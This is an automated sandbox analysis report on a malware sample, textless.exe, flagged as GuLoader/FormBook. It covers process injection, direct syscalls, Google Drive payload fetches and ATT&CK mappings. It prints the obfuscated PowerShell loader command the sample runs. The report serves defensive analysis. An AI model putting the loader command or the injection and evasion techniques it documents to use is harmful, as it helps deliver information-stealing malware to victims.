            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtCreateMutant: Direct from: 0x776D35CC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtAllocateVirtualMemory: Direct from: 0x776D2BFC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtDelayExecution: Direct from: 0x776D2DDC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtProtectVirtualMemory: Direct from: 0x776C7B2E
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtQuerySystemInformation: Direct from: 0x776D2DFC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtReadFile: Direct from: 0x776D2ADC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtCreateFile: Direct from: 0x776D2FEC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtOpenFile: Direct from: 0x776D2DCC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtOpenKeyEx: Direct from: 0x776D2B9C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtNotifyChangeKey: Direct from: 0x776D3C2C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtSetInformationProcess: Direct from: 0x776D2C5C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtProtectVirtualMemory: Direct from: 0x776D2F9C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: NULL target: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Section loaded: NULL target: C:\Windows\SysWOW64\logman.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\logman.exe | Section loaded: NULL target: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe protection: read write
            Source: C:\Windows\SysWOW64\logman.exe | Section loaded: NULL target: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Versificator.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Users\user\AppData\Local\Temp\Versificator.exe base address: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Versificator.exe base: 1660000
            Source: C:\Users\user\Desktop\textless.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Versificator.exe "C:\Users\user~1\AppData\Local\Temp\Versificator.exe"
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
            Source: C:\Users\user\Desktop\textless.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$initialforkortelse28=gc -raw 'c:\users\user\appdata\roaming\fyldepenneblkkets\fremtoning\skoledrenge227\cacodemoniac.pro';$forminate=$initialforkortelse28.substring(54637,3);.$forminate($initialforkortelse28)"
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: 0ogHncCUa.exe, 0000000E.00000002.2118858292.0000000001420000.00000002.00000001.00040000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000000.1931804743.0000000001420000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B

Stealing of Sensitive Information

Source: Yara match | File source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix, listed per tactic column (the number in parentheses is the count the matrix shows next to a matched technique; techniques without a number are the matrix's unmatched cells):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1), Shared Modules (1), Command and Scripting Interpreter (1), PowerShell (1), Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Access Token Manipulation (1), Process Injection (512), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1), Masquerading (11), Virtualization/Sandbox Evasion (41), Access Token Manipulation (1), Process Injection (512)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (4), System Information Discovery (124), Security Software Discovery (231), Process Discovery (2), Virtualization/Sandbox Evasion (41), Application Window Discovery (1), Remote System Discovery, System Owner/User Discovery, Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Clipboard Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (13), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1633447 | Sample: textless.exe | Start date: 10/03/2025 | Architecture: WINDOWS | Score: 100
(Bracketed numbers after a process node are the counts the graph attaches to it: created registry values / created files.)

Start node
  DNS/IP: drive.usercontent.google.com; drive.google.com
  Signatures: Multi AV Scanner detection for submitted file; Yara detected FormBook; Yara detected GuLoader; Joe Sandbox ML detected suspicious sample
  started: textless.exe [1, 39]; svchost.exe [1, 1]
textless.exe [1, 39]
  dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32
  started: powershell.exe [30]
svchost.exe [1, 1]
  DNS/IP: 127.0.0.1 unknown unknown
powershell.exe [30]
  dropped: C:\Users\user\AppData\...\Versificator.exe, PE32; C:\Users\...\Versificator.exe:Zone.Identifier, ASCII
  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Sample uses process hollowing technique; 4 other signatures
  started: Versificator.exe [6]; conhost.exe
Versificator.exe [6]
  DNS/IP: drive.usercontent.google.com 142.250.185.97, 443, 49693 GOOGLEUS United States; drive.google.com 216.58.212.142, 443, 49692 GOOGLEUS United States
  Signatures: Multi AV Scanner detection for dropped file; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  injected: 0ogHncCUa.exe
0ogHncCUa.exe (injected by Versificator.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  started: logman.exe
logman.exe
  Signatures: Maps a DLL or memory area into another process
  injected: 0ogHncCUa.exe
0ogHncCUa.exe (injected by logman.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
textless.exe | 31% | Virustotal |
textless.exe | 24% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Versificator.exe | 24% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll | 0% | ReversingLabs |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 216.58.212.142 | true | false | | high
drive.usercontent.google.com | 142.250.185.97 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000001.00000002.1494796227.000000000098A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000004.00000003.1203307470.0000025524E00000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000004.00000002.2121276429.0000025525000000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ftp.ftp://ftp.gopher. | Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com/ | Versificator.exe, 0000000B.00000002.2011875250.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmp | false | | high
https://drive.google.com/H | Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | svchost.exe, 00000004.00000003.1203307470.0000025524E59000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Versificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | textless.exe, textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws | svchost.exe, 00000004.00000002.2119751877.000002551FAA5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Versificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp | false | | high
https://apis.google.com | Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
216.58.212.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false

IP
127.0.0.1
